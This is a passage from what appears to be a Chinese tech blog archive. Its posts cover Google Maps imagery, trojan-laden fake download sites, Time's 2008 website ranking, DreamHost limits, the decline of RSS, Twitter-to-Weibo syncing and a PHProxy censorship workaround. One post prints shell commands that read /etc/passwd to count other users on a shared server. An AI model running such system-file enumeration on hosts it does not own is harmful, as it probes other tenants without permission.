你的申请材料交给ISP以后,他们会帮你把材料转交给相关部门处理。按照工作程序,材料递交给相关部门后,将会在3个工作日内解除封锁。
Google地图更新澳洲航拍图
据Google观光报道,近日,在澳大利亚日拍摄的悉尼的超高分辨率航拍图像被增添到了Google Maps中。Google在自己的电子邮件中也公布了包括鲨鱼湾沙滩、海滩上的男子、卢纳公园、海军舰艇、船舶的高楼大厦、炮台、圆形码头和一个令人震撼的飞行中的直升机!
但是我们也不甘示弱!所以这里我们发布自己认为最好的景点,比如下面这个孩子在荡秋千,地上的影子清晰可见……
…一个草形成一个怪异的玻璃金字塔后面的草地上有“性+死亡”的文字…
人们在一个漂浮在水面的乒乓球台上打乒乓球。
澳大利亚日的活动和其余的Google航拍是不同的,因为他们预先宣布会有飞机飞过,甚至提供了跟踪,使你能知道何时飞机会飞到头顶。
据《悉尼先驱晨报》报道,很多人想趁机好好发布一些免费广告,一家本地公司就花了一万澳元制作了一个巨大品牌标志,有些人甚至在做自己的政治宣传活动。
不过,似乎这一切努力都是徒劳的,因为据报导说,这架飞机后来使用了和计划中不同的飞行航道,而且并没有在计划时间内飞抵,也没有拍摄那么多照片。
在Bondi沙滩,我们发现不少Google卫星下的裸体图片的新作品(可能不久我们可能就要出“卫星下的一百大裸体图片”了)。
经过数小时的搜寻,我们没有找到在这次航拍中发布私人广告的实际例子,当然,下面的除外:
最后需要说明的是:这些图片目前还没有更新到Google Earth上。
翻译:William Long,译文地址:Google地图更新澳洲航拍图,原文:Google观光
2013年2月22日星期五
请小心Picasa和Firefox的下载站
由于一些网络界的害群之马的所谓“成功网赚经验”,已经让本来好好的Firefox推介和Picasa推介价格降低,之后被迫停止了,但是,即使Picasa和Firefox的推介已经没有广告显示,国内那些搞点击欺诈的网站还是会对那些专门优化了的引导站进行“废物利用”——直接让用户下载木马病毒。
如果大家想要下载Picasa和Firefox,那一定要小心,千万不要从第三方网站上面下载,比如用户在Google搜索“picasa3”,排在前面的就是一个欺诈网站,搜索Firefox也一样能发现不少欺诈网站,诱骗用户下载恶意程序。
这些人当初为了欺诈Google进行骗钱,做个那么多针对Picasa和Firefox的垃圾站,现在终于把Google推介搞死了,他们竟然在上面放木马继续坑害用户,Google竟然没有在搜索结果标示恶意网站实在令人诧异。
即使Google未来将其标记了,也还有百度,而百度是国内使用量最大的搜索引擎,有不少低端网民都使用百度,并且根本不会判断哪些是恶意网站,因此希望百度能拿出自己的社会责任感,对于搜索结果中包含木马的网站也像Google那样标识恶意网站,这样才能彻底切断这些木马病毒的流量来源。
目前这些恶意网站的木马病毒做的还比较低级,容易判断,大多数都是用一个不相关的EXE文件名,大小也不对,有经验的网民一眼就可以看出这是赝品,不过如果其再多做一些伪装的话,那样就难以判断了。
建议下载Picasa和Firefox或者其他应用软件,都直接到官方网站或者大型下载网站下载,切勿到一些来历不明的网站下载,搜索引擎有时候也是靠不住的。
腾讯QQ十年活动
11月11日,腾讯QQ迎来了自己的10岁生日。同时举行了腾讯“我的十年”活动,活动自2008年11月11日起至2009年2月28日止,活动内容包括三部分:十年感言、十年故事、十年接龙。评奖分为三期,每期的奖品为:一等奖2名,每人5000元人民币;二等奖10名,每人1000元人民币;三等奖100名,每人100元Q币。
登录我自己的QQ十年地址,可以看到自己QQ的统计信息,我的QQ注册时间是1999年11月01日,QQ年龄是9年,原来我的QQ是在腾信成立不到一年就注册的,我自己都快不记得了。当时是我部门一个同事邀请我注册的,原先我用的是ICQ.而下载,ICQ基本已经没用了。
在好友地理位置上,可以看到自己所有好友所在的省份,我的好友以广东省最多,有40个,其次是北京和江苏。移动鼠标还可以了解各个地方的好友数量。
发表过QQ十年感言的用户,可以点亮十年QQ图标。
Firefox火狐中国版试用
火狐中国版是谋智专为中国用户定制的浏览器,提供全方位浏览体验。经过我的一番安装测试,感觉除了多了个雅黑字体有点用外,其他的基本上没啥用处。
所有新增的功能实际上全是通过插件方式实现的,我觉得还不如提供一个插件包下载,让使用普通Firefox直接安装这些插件方便。火狐魔镜感觉还不如Google工具栏方便,其他的插件也是可有可无,并且Firefox并非安装的插件越多越好,安装越多插件,Firefox启动通常会越慢,没什么用的插件还不如直接卸载。安装完火狐中国版后,我查看基本上有用的插件其实没几个,不过雅黑字体比宋体看上去好看一些。
总之,这个火狐中国版感觉没什么用处,不如原版Firefox好。
以下是火狐中国版官方网站介绍的该软件的新特性:
标签浏览
增加“双击关闭标签”(Close Tab By Double Click)的小功能;通过Tab Improve Lite扩展轻松打开新标签。
方便搜索
可通过主页、右上两个搜索框,以及选取任意页面中的任意关键字并拖拽等多种方式实现搜索功能,不同方式会得到不同的搜索结果,让您对资讯的获取随心所欲。
热键和常用工具
界面工具栏添加Easy Access快速启动图标,截图更方便,同时还可快速启动记事本、计算器和我的电脑等常用Windows应用,更收录了常用热键,便于用户查看,点中后马上执行该操作。
页面样式
通过界面右下角的缩放控制面板(Zoom Panel),让整个页面及文字的缩放轻松自如。同时可通过界面右下角字体按钮,随意选择页面显示字体。
Google推出谷歌手机软件包
据Google黑板报报道,谷歌中国将网页、地图、图片、资讯、财经、字典等手机搜索服务集成为一个“谷歌手机软件包”。在诺基亚智能手机(使用Symbian S60v3操作系统)上安装这个谷歌手机软件之后,用户只需要在待机画面上点击快捷键就可以立即开始使用谷歌搜索了。
除了搜索普通的网页,谷歌还提供了更多专为手机量身定做的搜索服务。用户可以通过谷歌手机软件访问手机地图、图片搜索、新闻资讯、股票动态和在线字典。
谷歌手机软件是免费使用的,但用户使用需要支付运营商流量费用。
点这里下载基于S60的谷歌手机软件。或点这里访问S60手机软件主页。
其他系统的手机用户,可以访问谷歌移动产品页面查找更多手机定制的软件和服务。
2008年度全球50个最佳网站
美国《时代》杂志公布了2008年度最佳网站50强,评选的标准为网站的成长和发展前景、内容和可用性以及独特性和创新性等。这些网站或者像GPS设备一样实用,或者可以帮助用户消磨时间。
《时代》公布的2008年度最佳网站50强分为五个类别,分别是建议和事实类、信息和八卦类、便捷工具类、趣味和游戏类、以及爱好和兴趣类。从2003年开始,《时代》每年都会评选出最佳网站50强,从这些网站身上可以看出互联网的变革与发展,同时认清哪些网站能够引领潮流。例如,eBay、亚马逊、YouTube和Digg等热门网站都曾在不同时期入选《时代》的榜单。
2008年度最佳网站50强:
| 排名 | 名称 | 类别 | 平均分 |
| 1 | Penny Arcade | 趣味和游戏 | 98分 |
| 2 | Petfinder | 爱好和兴趣 | 80分 |
| 3 | GasBuddy | 建议和事实 | 79分 |
| 4 | FreeRice | 爱好和兴趣 | 77分 |
| 5 | ProFootballTalk | 信息和八卦 | 76分 |
| 6 | Kongregate | 趣味和游戏 | 76分 |
| 7 | TinyURL.com | 便捷工具 | 74分 |
| 8 | HypeBeast | 爱好和兴趣 | 73分 |
| 9 | Geni | 便捷工具 | 73分 |
| 10 | Huru | 趣味和游戏 | 73分 |
| 11 | Howcast | 建议和事实 | 72分 |
| 12 | Someecards | 趣味和游戏 | 68分 |
| 13 | Urban Dictionary | 便捷工具 | 68分 |
| 14 | WikiSky | 爱好和兴趣 | 68分 |
| 15 | Apartment Therapy | 爱好和兴趣 | 65分 |
| 16 | COLOURlovers | 爱好和兴趣 | 63分 |
| 17 | Zeer | 建议和事实 | 63分 |
| 18 | Mint | 便捷工具 | 63分 |
| 19 | Picnik | 便捷工具 | 61分 |
| 20 | PopSugar | 信息和八卦 | 60分 |
| 21 | Rate My Professors | 信息和八卦 | 60分 |
| 22 | The Nest | 信息和八卦 | 60分 |
| 23 | TripKick | 建议和事实 | 60分 |
| 24 | Kiva | 爱好和兴趣 | 58分 |
| 25 | Serious Eats | 信息和八卦 | 58分 |
| 26 | Wikitravel | 建议和事实 | 57分 |
| 27 | SearchMe | 便捷工具 | 57分 |
| 28 | Yahoo! Answers | 建议和事实 | 55分 |
| 29 | Lookybook | 趣味和游戏 | 54分 |
| 30 | ffffound.com | 趣味和游戏 | 52分 |
| 31 | Open Source Food | 爱好和兴趣 | 51分 |
| 32 | WebSudoku | 趣味和游戏 | 48分 |
| 33 | Imeem | 趣味和游戏 | 48分 |
| 34 | Cylinder Preservation | 趣味和游戏 | 48分 |
| 35 | AskMen.com | 信息和八卦 | 47分 |
| 36 | Digital Vaults | 爱好和兴趣 | 46分 |
| 37 | MapJack | 便捷工具 | 46分 |
| 38 | CarbonRally | 爱好和兴趣 | 45分 |
| 39 | PsychCentral | 建议和事实 | 45分 |
| 40 | Afrigadget.com | 信息和八卦 | 44分 |
| 41 | ConcreteLoop.com | 信息和八卦 | 41分 |
| 42 | Nymbler | 便捷工具 | 41分 |
| 43 | Health.com | 信息和八卦 | 40分 |
| 44 | NexTag | 便捷工具 | 40分 |
| 45 | Mobaganda.com | 便捷工具 | 38分 |
| 46 | Pixelgirl Presents | 便捷工具 | 37分 |
| 47 | Omiru | 建议和事实 | 36分 |
| 48 | iliketotallyloveit.com | 建议和事实 | 33分 |
| 49 | Gaia Online | 趣味和游戏 | 32分 |
| 50 | Net-a-Porter | 爱好和兴趣 | 23分 |
2013年2月21日星期四
Dreamhost的MySQL存在限制
在购买DreamHost的时候,虽然上面标明了MySQL数据库是Unlimited(无限制),但是实际使用的时候却是有限制的,DreamHost的DNS稳定性也不太好,使用的时候需要多加注意。
以我的切身体会,我使用WordPress MU在DreamHost搭建一个免费托管博客服务,由于WordPress MU的特性,每新增一个用户都要在数据库中建立十多张表,因此,仅仅两千多个注册用户的WordPress MU就有了两万多张表,虽然使用WP Super Cache可以使得大量访问不需用访问数据库,并没有引起什么性能问题,但是DreamHost却说这个数据库的表太多,会使得他们每天的自动备份数据库出现超时错误,因此他们要求将这个WordPress MU数据库迁移到其他地方。
做为对照,我使用基于ASP+ACCESS建立的另外一个OBLOG博客托管服务,用户数已经达到一万三千多,使用起来却没有任何的问题,这不得不令我对WordPress MU的可用性发生了怀疑,可能这种建立多表的方式存在一些问题,对于MYSQL数据库的管理会不方便,当然,自己独立的MySQL数据库应该会好一些。
另外,我对DreamHost也比较失望,1月15号那天由于他们自己的操作错误,还给自动从包括我在内的大多数用户的信用卡中扣除了一年的费用,引起了一场大规模的乌龙事件,好在16号他们就将238.8美元退回了我的信用卡,这件事后我就将我的信用卡帐号从DreamHost中删除了,免得以后他们再乱扣款。
最后,根据bemike的方法,我SSH登陆后使用下面的语句得到我使用的这台服务器一共有388个SSH用户和1124个FTP用户,一台服务器上放这么多网站,难怪我登陆服务器速度这么慢。
grep -i /home/ /etc/passwd | grep /bin/.*sh$ | wc -l
grep -i /home/ /etc/passwd | wc -l
2013年2月20日星期三
抓虾网可能快要倒闭了
据网易科技报道,网易科技从可靠渠道获悉,国内RSS订阅的代表网站抓虾网已陷入经营危机,目前已有大量核心人员流失,并停止内容升级。
据了解,抓虾网的核心程序人员已出现大量流失,并且网站已停止进行内容升级,仅有少量员工负责简单的技术维护工作。此前,曾有传闻称受金融海啸影响,抓虾网已倒闭,但据网易科技了解,这一传闻并不属实。目前抓虾网内有2至3名员工负责网站的日常运营,同时该网站的两名创始人徐易容与谌振宇仍在公司上班。有接近抓虾网的人士透露,是否关闭网站,主要取决于创始人是否打算放弃。对方称,尽管抓虾网的风险投资商联创策源已对该网站停止投入,但凭借两名联合创始人的资金实力,维持生存应该没有问题。
“可能现在他们要考虑一下未来的发展方向了。重点不是抓虾网是否要关闭,而是他们未来会如何突破,毕竟RSS订阅现在来看还是太小众了,我相信如果他们找到一个好的方向,这次就算失败也是很好的经验。”该人士认为,抓虾网两名创始人徐易容与谌振宇是国内为数不多的优秀创业者,即使进行再创业,仍会被投资者看好,并且通过抓虾网的运营,两人已积累了丰富的创业经验。
目前抓虾的用户其实并不少,可惜在线阅读器实在是缺少商业模式,免费的Google Reader又在大量蚕食这个市场,抓虾和Google Reader的这种直接竞争的确很吃力,现在外部环境也不好,金融危机已经逐渐开始蔓延,一直亏损下去也不是长久之计,不过,如果抓虾目前也有不少忠实用户,就这么放弃也挺可惜的,国内创业能发展到这么多的用户和影响力也很不容易啊,只留少数人员维护也可以坚持一段时间。
RSS阅读时代的没落
伴随着2002年博客概念的兴起,互联网大量新内容不断催生,怎样让用户更有效率阅读变成一个重要话题。RSS作为一种主动推送技术,跟着博客一起走入了主流视野,让用户能够很方便获得喜爱网站的更新,一定程度上缓解了互联网信息过载及阅读效率低下的弊端。
对RSS的疯狂追逐在2005年达到了一个高峰,各大媒体网站不甘落后地在自己网站加上RSS订阅功能,Mozilla Firefox、Safari、Opera、IE7等浏览器第一时间加入了RSS阅读功能,就连电子邮件客户端软件Windows Live Mail、Mozilla Thunderbird也提供了RSS订阅功能,各种RSS托管、阅读器更是层出不穷。但是五年后,这些曾经名动一时的RSS产品要么消失要么转型,仅剩的几个也是苟延残喘,没有人再讨论RSS,没有人再讨论社会化阅读,似乎RSS阅读已经变成一个过时的概念。
国外地位尴尬的FeedBurner
FeedBurner 2004年在美国芝加哥创立,RSS托管服务正是由他们开启,将你的RSS源托管到他们的平台,你将能够知道你的RSS源有多少稳定读者,他们分别点击了你的哪些文章,甚至他们来自于哪些阅读器,这些数据为网站内容的改进提供了重要的数据支持,当然一个微不足道的好处是他能够减少你服务器的压力,因为这一切完全由他们的服务器来搞定。
FeedBurner在2007年5月23日被Google以1亿美元现金收购,之前的付费功能全部免费,结合了Google AdSense推出RSS广告。但是两者的结合并没有带来想象中的巨大成功, 之后FeedBurner就一直不温不火,目前仅仅处于维持阶段。
国内停滞不前的Feedsky
也许称它为中国的FeedBurner更合适,2005年创立的Feedsky也提供了RSS托管功能,由于FeedBurner一直没有推出中文版本并且客房问下不佳,所以Feedsky迅速俘获了一批国内用户的心。用户可以绑定自己的域名,获取订阅数、点击数、阅读器分布等数据。
2006年10月,RSS处理托管服务商Feedsky获得联创策源五十万美元投资,随后开始尝试话题广告、RSS广告等盈利模式,由于运营策略不清晰,受到大量用户批评。2008年11月,Feedsky被北京腾信互动广告公司全资收购,之后Feedsky就一直陷入停滞状态,没有新业务拓展,并且稳定性也频频遭到挑战。
曾经的最好离线RSS阅读器- FeedDemon
如果你不习惯使用那些网页RSS阅读器,那么我推荐你使用FeedDemon这款客户端阅读器,它是我使用过最好用的离线RSS阅读器。但是这款优秀的RSS阅读器在2005年被Newsgator收购,收购之后软件完全免费并且不断推出功能改进(支持Google Reader同步),但是伴随着RSS概念的衰落,FeedDemon的日子也是越来越不好过。
完全陷入停滞的抓虾
抓虾在05、06年的时候绝对是如雷贯耳,他们提供在线的RSS阅读、管理功能,成为当时国内WEB2.0网站的标杆之一,那个绿色的创意Logo更是让人印象深刻。据传受到资方压力被迫调整方向,最后落得惨淡收场,目前也只是维持功能正常而已。后经由投资方联创策源牵线,2009年被豆瓣收购,而豆瓣手里已经有同类项目九点,这次收购注定了抓虾的杯具命运。
苟延残喘的鲜果
和抓虾一样,鲜果是在线RSS阅读器的后起之秀,产品不可谓不优秀,团队不可谓不执着,但是面对RSS领域衰弱的大趋势却也无可奈何。后期鲜果推出了类微博服务,近期的改版增加了读书频道,弱化阅读器的改变,强化热文以及社会化阅读功能。但是按照鲜果现在的产品看,很难有大的突破。
巨头的全面围剿
在众多RSS相关服务的日渐衰弱同时,巨头的围剿更是让他们雪上加霜。对于巨头们而言,赚不赚钱反倒不是那么重要的问题,只要能够凝聚用户自然有办法赚到钱。
最好的例子是Google Reader,这款Google旗下的在线阅读器毫无疑问是目前最优秀的RSS阅读器,强大的功能和持续的改进让它获得用户的青睐。与此同时,网易旗下的有道、腾讯旗下的邮箱团队也竞相推出RSS阅读功能,有用户、有钱、有人让他们无往不利,也让他们成为这个时代落幕的最好注脚。
RSS输给了谁?
直到现在我仍然坚持认为RSS是伟大的发明,它让读者从被动接受变成主动筛选,推送技术极大提高了阅读效率,减少了阅读的额外时间消耗。但是为什么时隔五年后,没有人再愿意进入这块领域?
最直观的原因是赚不到钱,大多数用户对于RSS订阅服务只是抱着试试看的想法,日积月累下来大家沉淀下来的用户并不多,更何况这部分用户距离消费比较远,数量的累计也很难体现出媒体价值,最后的结果就是没用户没钱,想不死都难。
RSS领域各种服务的衰落,是互联网买好不卖座的典型案例,也是一个难以改变的杯具,RSS阅读时代终将落幕。
来源:XJP投稿,原文链接。
实时同步Twitter信息到新浪微博
如何自动将的Twitter信息同步到国内的新浪微博、开心网、人人网等国内SNS网站,我先前曾经介绍过一个同步方法,该方法虽能实现同步功能,但是同步不是实时的,有大约一小时左右的时差,这个时差是由TwitterFeed引起的,同时该方法的设置较为繁琐,需要多次翻墙。
因此,我开始尝试一种新的同步方法,开发了一个定时自动读取并同步Twitter信息的Python程序,以简化同步的流程,并缩短同步时间,做到基本实时同步功能。原先的同步的流程图是: twitter -> appspot -> twitterfeed -> ping.fm -> customurl -> huotu -> 新浪微博,新的同步流程变成了: twitter -> appspot -> huotu -> 新浪微博,步骤大为简化,只需在GAE上设置一个定时执行的计划任务即可。
由于GAE支持Cron Job计划任务,因此,我们的Python程序可以实现每分钟自动调用一次,调用的时候,先从Twitter上抓取用户最新的消息,抓取成功后,将消息同步到嘀咕火兔,然后分发到新浪微博、开心网等,如果设置为每分钟执行的话,同步时差只有一分钟左右的时间,基本实现了实时同步Twitter信息到新浪微博等SNS网站的功能。
该程序Python程序我在GAE上调试并不太顺利,按照官方的说明配置好了cron.yaml文件,但是更新twitter.py之后,Cron Job计划任务还是不起作用,后台也看不到相关的Cron Job任务。
后来经过一番研究,终于解决了GAE中Python的Cron Job计划任务问题,原因很简单,因为我的“Google App Engine SDK for Python”是很久以前安装的,那时候GAE还不支持计划任务,因此无法更新cron.yaml文件,重新下载了一个最新版本的“Google App Engine SDK for Python”安装后,Cron Job计划任务更新就成功了。
不过,新的问题又来了,我发现该应用调用Twitter API的时候,失败率非常高,几乎有一半的情况,调用的时候会提示“Rate limit exceeded. Clients may not make more than 150 requests per hour.”,这让我怀疑GAE的外部IP是不是非常少,还有很多第三方程序在GAE上调用Twitter API,才导致每小时的调用超过150次,否则的话,光我自己的调用绝对不会有这么高的频率,大概是因为Twitter没有将GAE的IP设置为白名单,如果有一天Twitter不限制GAE的IP,那应该就没什么问题了。
安装使用说明:
下载方法,使用TortoiseSVN检出这个SVN地址,然后,编辑app.yaml,修改为自己的appspot应用名,接着,修改twitter.py文件的最后一行,将自己的Twitter用户名,嘀咕火兔用户名和密码分别填入,cron.yaml文件里是计划任务设置,然后就可以按照此文的方法进行发布,执行 appcfg.py update 目录名,使用Gmail帐号和密码,就可以发布了。
发布之后,GAE就可以定时执行twitter.py程序,由于定时执行可以设置最短为1分钟,因此同步速度很快,基本可以实现即时自动同步的效果。
Twitter就是Google杀手
上次看到一篇“Twitter可能是Google杀手”的文章,引起了笔者的兴趣,因为笔者本有Twitter代替Google搜索的可能,于是写了本文,如有不到之处,还请指点。
随着互联网的发展,如社会之发展,消息,工具在分工细化。hao123,百度,人人,新浪微博。以前说信息爆炸,其实是信息未细化,对于非相关的,即时的便是无用的了。也因此过后信息消失后不会引起大的问题。有趣的是美军的数字化师便有此问题,信息收集快速,多维,但不能有效处理,于是不同单位不能获得需要的,即时的数据,信息消失后还会引起大的问题——死亡。马克思说技术首先应用到战争中,这意味问题——在互联网,现实社会中能实际影响了。
SNS,一个有意思的东西。我不想重复解释,只说重点——SNS的未来和应用。SNS聚集了有相同背景或知识的人,但能实际产生效益于他们很少。博客,QQ ,空间等等只是聚集同层面的人,他们只能交流知识,因为这是一个平行的产业链关系网 ,但是一个聚集垂直产业链的关系网能将他们的知识 经验 技能,化为实际行为的产生——SNS的真正意义,实际效益产生之所在。SNS应该的本质,一个比喻:梳子。梳子分群——SNS,梳子排序——人际圈。人际圈较高的成功合作是因为朋友引荐同人群现实,可靠的产业链上下游的人际圈。合作是因为链式反应。实际上SNS的发展方向会是这样,类似社区加居委会,居委会为中心,不同的社区在此以需求自然交集。广告, 信息 ,人际圈便是传播联系,而居委会——公共管理。之所以是公共管理因为信息爆炸,人的现实, 虚拟信息在比特化,隐私 ,小圈子 在打破再组合。
于是SNS的应用,它们本质性地传播相应群体需要,即时的信息。信息查询(搜索)由被动转为主动,平行,垂直的产业链,关系网可以以不同形式,层次地连接,分离。你可以将其看做百度+百度知道+百度百科+百度HI+百度有啊。所以信息的需求将使Twitter就是Google杀手。说到这,未来的互联网底层结构,上层应用也大致清晰了,“内容为王”这个口号要倒霉了。
来源:读者投稿,作者:wj186000。
中国版谷歌地图支持卫星地图
去年我们曾经讨论过谷歌地图和Google Maps的不同点,最重要的一点就是,Google Maps支持卫星地图,而谷歌地图不支持。随着上个月Google Maps的改版,开始支持中国的传统地图的地理交通信息,使得Google Maps的功能已经涵盖了谷歌地图,现在谷歌地图终于也开始支持卫星地图了。
现在访问谷歌地图,“地图”和“地形”之间会多一个“卫星”按钮,点击后就会显示卫星地图了。
根据我的观察,传统地图和卫星地图之间的坐标还是存在较大的误差,在同一个地理位置,根据我使用Google Earth的标尺进行测试,两者坐标实际偏差超过六百米。巨大的数据误差使得这项功能的可用性大打折扣。值得一提的是,搜狗推出卫星地图服务并没有这种坐标误差,实际标注和卫星地图的位置是一致的。
Google推出英国街景地图
据BBC报道,世界搜索引擎巨头Google最新推出英国街景360度全方位地图,详细街景尽收眼底。Google街景地图囊括的英国城市共有25个,从北部的阿伯丁(Aberdeen)到南部的南安普敦(Southampton)的街景都一览无余。
除了360度的英国街景地图之外,Google还在同一天推出了荷兰的全方位街景地图。Google方面透露说,为了推出英国的这个版本,该公司动用专门的摄像车,共对22,369英里长的街道做了实景拍摄。用户在登陆Google网站后,只要输入地址和邮编,然后拖动屏幕左上角的一个人形标示去到你想要查看的地点,当地的街道景象就会展现在你眼前。用户还可以通过向上下左右拉动鼠标,来观看当地东南西北的全方位景象。
Google方面说,这一地图的推出之所以耗时很长,是因为该公司希望能够在最大程度上保护个人隐私不会因此而受到损害。为了确保私人信息不会外泄,该公司在网站上公布的地图都是公众在街道上可以看到的公共地区的地图,私家地界都不在地图包括的范围内。此外,Google方面还对出现在地图上的公众面部和车牌号码做了模糊处理。
在地图计划推出的初始阶段,英国官方曾担心这种原景360度地图可能会导致个人隐私外泄。但英国信息委员会(ICO)于2008年裁定,对面部和车牌做模糊处理,可以起到保护隐私的作用。
Google街景于2007年5月上线,最初只有美国5座城市的街景照片,此后不断扩充到了数十座美国城市,还包括法国、意大利、澳大利亚、日本、西班牙、新西兰的部分城市。日前开通的英国区是Google街景涉足的第八个国家,同时开通的还有荷兰的三座城市:阿姆斯特丹、鹿特丹和格罗宁根。
这些城市的街道照片是Google的专用拍照车辆于去年夏天遍游英国拍得的。城市包括:伦敦、牛津、剑桥、诺丁汉、德比、谢菲尔德、利兹、曼彻斯特、布拉德福德、斯坎索普、布里斯班、诺维奇、纽卡斯尔、伯明翰、考文垂、利物浦、南安普敦、约克、贝尔法斯特、卡迪夫、斯旺西、格拉斯哥、爱丁堡、邓迪和阿伯丁。
Google发布台湾、葡萄牙、瑞士街景地图
据Google Latlong和ZDNet报道,Google今天发布了台湾、葡萄牙、瑞士的街景地图,这也是Google在首个华人地区上线街景地图。
虽然Google的街景车早先同时在香港、澳门、台湾展开街景拍摄工作,但目前却只有在台湾发布了街景地图,而香港澳门还没有发布。
为了加快台湾的街景拍摄速度,Google已经将台湾的街景车从原来的一辆增加到五辆,目前台湾的街景地图包括台北、新店、三重与板桥等地的部份街景地图,稍后会制作出彰化、新竹、花莲、高雄、屏东、台中、台南、台东、桃园与宜兰等地的街景地图。大家现在就可以在街景地图上看看台北101等台湾地区的街景。
Google台湾表示,除了依照台湾的法律规则拍摄道路上的景色,以及采用技术手段模糊街景地图中的可辨识人脸与车牌外,也在街景地图服务网页的左下方提供“报告问题”的隐私回报机制,只要使用者对已发布的街景有任何隐私防护的疑虑,都可通过此功能与Google反馈,Google会有专人负责处理相关事宜。
Google街景地图服务是该公司于2007年推出的一项地图服务,使用者可以透过该工具360度浏览街道实景。截至今日,Google业已于200多个城市提供街景地图服务。在亚洲地区,Google目前仅开放日本东京与台湾台北等地的街景图。
2013年2月19日星期二
我们能用国外主机做点什么?
为什么国外提供的服务器要比国内的idc空间流量都要大得多呢?动不动就是数十G的空间,数百G/月的流量,我总是用不完,说物美价廉一点也不过份啊,美的永远是商品,廉的不变是价格,我每个月能使用的连零头也不够,估计能用完这个流量的达人也不太多吧。这么大的空间,这么多的流量,放着多可惜,虽然价格低廉,可是总归是交了钱,总得想着法子用完才放心,请原谅我的无齿。
看看咱们身处的网络环境,我们总是在一个被东西围起来的环境中,有没有想过,出去看一看呢?难道外面的世界,真如传说中一般的黑暗么?为什么我们不能以一种成熟的心态去看看别人怎么评价我们,去看看别人过什么样的生活,或者,看一些我们想看的东西。有时候,这种想法是一种奢侈,不管在任何地方,任何时间,总是有一只拥有无比魔力的手,在紧紧地拽着我们,对不起,这里你不能进去。oh my god,从小我就被这样管教过,你不能做……,总是盼望自己长大,这样就可以做自己想做的东西,说自己想说的话,可是没有想到,这个家长永远地存在。这个家长为了自己能够永远地担家长,也为了让家长们得到更多的好处,于是他们宣杨,在这个家庭里,只有我才能做家长,别人都不行,那种轮流坐庄的制度不适合我们,我们是受命于天。他们控制着我们的一切,他们害怕我们看到外面的阳光,让我们以为这个世界,只有自己家里最好。
还好,我们有互联网,有无数的精英在奋斗,在为觉醒而奋斗,我们如同黑客帝国中的电池,在被机器控制的地方,你可以感觉到你在享受美食,你可以感觉到你的爱人,但,这一切都是假的,你不是你。我们需要真实的锡安,就算只能吃到粗米,但起码,这里是真实的。我不需要机器替我来选择,我有我自己的头脑,我是一个完整的人,我是一个能分辨是非的人,我需要的只是真实的感觉。
拥有国外主机的人,你可以利用这个主机,来搭建一个探访锡安的电话线,如果你的主机还有SSL的话,比如Godaddy的用户,一般是买SSL来代替独立Ip的,那么你真是太幸运了。有一个叫Phproxy的程序,把它部署到你的服务器上之后,你就可以到达真实的锡安,看到任何你想要的东西,当然,你不能访问视频,更当然,还是有部分网站会导致程序出错无法访问,但是,你可以看到更多东西,好的,坏的,真的,假的,还有让人心神不宁的。
中国文化的博大与精深在于,一个字可以有很多种意义,而在这个富有创造性的平台上,再加上我们富有创造性的人们,我们可以给一个字赋予太多太多的含义,如某位委员说,我们应该把3Q、槑之类的字禁掉,上帝啊,请原谅这位朋友的无知,因为他自己也不知道在做什么,他们是这个世界上最厉害的骗子,因为最厉害的骗子是把自己也骗了,有一种骗子,他相信他自己没有骗人,他被自己以及自己的团队给忽悠了,他认为自己是天使下凡来拯救黎民苍生,只可惜脑袋先着地了。他也太小看我们的智慧了,我们有太多太多的创造力,任何一个字,我们都可以赋予它新的含义,文字只是我们宣泄的一个载体,我们需要一种抗议,只是这种抗议是无声的,就像新浪会采用“评论15939条,显示123条”这种方式来表达默默的愤慨。
我不知道是谁创造了佛跳墙这道菜,这个名字真是太有意思了,佛急了,也会跳墙的,何况你我?有主机的佛们,还在等待什么,需要看到真实的世界么?欢迎来到真实的世界。
有一种鸟儿是永远也关不住的,因为它的每片羽翼上都沾满了自由的光辉。
作者:conis,原文地址。版权声明:本文授转月光博客刊登,其他非授权网站媒体转载,需要添加作者网站地址http://iove.net,否则视为侵权。
两个重要而又容易被忽视的角色
我敢打赌,在中国,一半以上甚至更多的,以网站为主营业务的或者把网站很看重的公司,没有Web前端工程师和产品工程师这两个职位,甚至有些有点规模的公司也可能没有这个职位,当然,这不能包括像alibaba,sina,163这样的公司,只是指中小型公司而言。如果你们公司有,请给我留言告诉我你们公司的规模和相关的信息。
做得好一点的公司,一般是项目经理/部门主管+投资方(项目管理中的投资方,实际上就是老板,反正就是决定你要做什么并给你钱的人)来承担产品工程师的角色,由美工来承担Web前端工程师的角色,特别是Web前端工程师,是最容易被忽略的角色。
企业想挤出利润,无非两个方面,一个是开源,另一个是节流。而这两个角色,恰恰可以用开源节流来比喻,产品工程师可以设计出更好的产品,这就是开源,Web前端开发工程师可以精简网页代码,提高用户访问速度,减小企业带宽上的支出,甚至可以减小服务器上的支出,这不是节流是什么?相比有些企业,以靠克扣员工工资来实现节流,这个节流要节省得多。
产品工程师
很多公司的流程基本上是这样的,由需求部门(一个或者多个,如果公司小,可能就是老板等几个人)提出需求,提交到项目经理或者IT部门主管,然后 IT部门主管根据需求进行开发,这中间可能要判断是做还是不做,判断的依据主要是开发难不难,麻烦不麻烦,很少去考虑合不合理。各位,看到什么问题没有,很多IT的部门主管,他只是一个管理者+项目经理的组合,或者干脆就是一个项目经理。需求部门交给我的需求,我按照要求按时按质做完就OK了。但时,需求部门往往是不懂互联网的,这种情况很多公司大量存在,对于一些老板本身就是做互联网的,或者较大的公司,这种情况会比较少。
问题就来了,一个不懂互联网的人,根据自己的喜好或者自己的判断来提出一些需求,有些需求可能很无理,有些时候可能是自己的喜好,有些时候可能是违背互联网的基本准则的。而技术部门往往是只要没有技术难度就开发吧,反正我就按你要求做了,这个中间,没有一个懂互联网的人来把关。注意,懂互联网的人,不是懂技术的人,懂技术的人很多都是不懂互联网的。比如说我曾经见过有公司的老板要在网站的两边加一副对联,结果别人说像灵堂一样,也曾经有公司的老板要把网站做得像电视一样(不是视频网站,就是一个非常酷的过场动画这样子,想法是好的,可惜不适合大型网站,不利于访问也不利于SEO)。
这个时候一定要有一个产品工程师或者产品组来承担这个中间人,注意,还没有到美工的层面,他需要根据需求方的需求,再加上自己对互联网的了解,来设计这个产品。他要考虑到浏览器、带宽、用户习惯等等内容,以确定如何布置页面中的内容,确定功能之间的关联。在这个时候,如果产品工程师不懂技术,可以邀请Web前端工程师和项目经理/部门主管参与,因为某些地方为了用户体验可能要使用到一些技术,需要由这些人来确定是否要行。
Web前端工程师
